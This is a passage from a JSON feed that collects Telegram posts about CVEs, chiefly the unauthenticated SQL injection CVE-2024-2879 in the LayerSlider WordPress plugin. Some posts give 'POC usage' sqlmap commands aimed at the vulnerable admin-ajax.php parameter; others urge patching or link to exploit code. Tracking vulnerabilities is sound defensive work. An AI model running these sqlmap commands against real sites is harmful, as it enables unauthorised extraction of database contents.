\u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC usage:\nsqlmap \"https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&amp;id[where]=\" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T\n\n\n#wordpress", "creation_timestamp": "2024-04-09T22:32:45.000000Z"}, {"uuid": "6029102b-10d1-41c6-ae10-4797597e4ab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1999", "content": "CVE-2024-2879 LayerSlider \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress\n*\n\u0412\u0435\u0440\u0441\u0438\u0438 LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\n*\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c, \u043a\u0430\u043a \u0438\u0442\u043e\u0433 = \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC usage:\nsqlmap \"https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&amp;id[where]=\" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T\n\n\n#wordpress", "creation_timestamp": "2024-04-09T22:31:52.000000Z"}, {"uuid": "25b3b372-44b5-4532-aac2-683126c905ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/AnonymusYemenn/4414", "content": "\u200f\u0627\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062e\u062f\u0645 \u0627\u0636\u0627\u0641\u0647 LayerSlider \u0641\u064a \u0645\u062f\u0648\u0646\u0647 WordPress \n\u0642\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0641\u0648\u0631\u0627\u064b \u0644\u0627\u0635\u062f\u0627\u0631 7.10.1 \u0644\u0648\u062c\u0648\u062f \u062b\u063a\u0631\u0647 SQLi \u062e\u0637\u064a\u0631\u0647\n\n\u0631\u0642\u0645 \u0627\u0644\u062b\u063a\u0631\u0647 : CVE-2024-2879\n\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0648\u0631\u0647 : 9.8\n\n\u3030\ufe0f\u2796\u2796\u2796\u2796\u2796\u2796\u3030\ufe0f\n\nt.me/MuhammadAlush0997\n\n\u062a\u0627\u0628\u0639\u0646\u064a \u0639\u0644\u0649 :\nTelegram | instagram | facebook | Twitter | YouTube", "creation_timestamp": "2024-04-04T18:36:17.000000Z"}, {"uuid": "f1f3b699-7f88-4725-9c02-02a1570cd480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/Termux_CS/7738", "content": "\u200f\u0627\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062e\u062f\u0645 \u0627\u0636\u0627\u0641\u0647 LayerSlider \u0641\u064a \u0645\u062f\u0648\u0646\u0647 WordPress \n\u0642\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0641\u0648\u0631\u0627\u064b \u0644\u0627\u0635\u062f\u0627\u0631 7.10.1 \u0644\u0648\u062c\u0648\u062f \u062b\u063a\u0631\u0647 SQLi \u062e\u0637\u064a\u0631\u0647\n\n\u0631\u0642\u0645 \u0627\u0644\u062b\u063a\u0631\u0647 : CVE-2024-2879\n\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0648\u0631\u0647 : 9.8\n\n\u3030\ufe0f\u2796\u2796\u2796\u2796\u2796\u2796\u3030\ufe0f\n\nt.me/MuhammadAlush0997\n\n\u062a\u0627\u0628\u0639\u0646\u064a \u0639\u0644\u0649 :\nTelegram | instagram | facebook | Twitter | YouTube", "creation_timestamp": "2024-04-04T18:36:15.000000Z"}, {"uuid": "c8b4509b-fcb7-439e-8d19-f9a888112724", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/thehackernews/4768", "content": "\ud83d\udea8 Heads up, WordPress admins! \n \nA critical SQL injection flaw in the LayerSlider plugin (CVE-2024-2879) could lead to sensitive data leaks. If you haven't updated, make sure to install version 7.10.1 or latest. \n \nFind details: https://thehackernews.com/2024/04/critical-security-flaw-found-in-popular.html", "creation_timestamp": "2024-04-03T07:17:28.000000Z"}, {"uuid": "e425c72e-3758-479d-bb2f-6d3b7059bb1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11156", "content": "#exploit\n1. Zero-Click Calendar invite - Critical 0-click vulnerability chain in macOS (CVE-2022-46723)\nhttps://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b\n\n2. CVE-2024-2879:\nWP LayerSlider - Unauth SQLI\nhttps://github.com/herculeszxc/CVE-2024-2879", "creation_timestamp": "2024-09-19T18:16:15.000000Z"}, {"uuid": "8df185ac-4b59-4c4d-8ada-1fe16d674e23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/394", "content": "#exploit\n1. Zero-Click Calendar invite - Critical 0-click vulnerability chain in macOS (CVE-2022-46723)\nhttps://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b\n\n2. CVE-2024-2879:\nWP LayerSlider - Unauth SQLI\nhttps://github.com/herculeszxc/CVE-2024-2879", "creation_timestamp": "2024-09-19T13:11:55.000000Z"}, {"uuid": "c5c34c1e-e0aa-4ecb-815e-974fc38753cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-28799", "type": "seen", "source": "https://t.me/cvedetector/3173", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-28799 - IBM QRadar Suite Software Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-28799 \nPublished : Aug. 14, 2024, 4:15 p.m. | 40\u00a0minutes ago \nDescription : IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 displays sensitive data improperly during back-end commands which may result in the unexpected disclosure of this information.  IBM X-Force ID:  287173. \nSeverity: 5.6 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-14T19:03:55.000000Z"}, {"uuid": "27c93179-85ee-4474-8bb4-27574f0771c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/933", "content": "#exploit\n1. Zero-Click Calendar invite - Critical 0-click vulnerability chain in macOS (CVE-2022-46723)\nhttps://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b\n\n2. CVE-2024-2879:\nWP LayerSlider - Unauth SQLI\nhttps://github.com/herculeszxc/CVE-2024-2879", "creation_timestamp": "2024-09-19T10:18:53.000000Z"}, {"uuid": "172aa1ca-5684-47c2-8c93-cc503b94bed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "Telegram/gYDigZBQT79wLw4T2X0Vtz5pGhUrZF7BpkXaCpssOiIcHLw", "content": "", "creation_timestamp": "2024-04-03T08:49:20.000000Z"}]}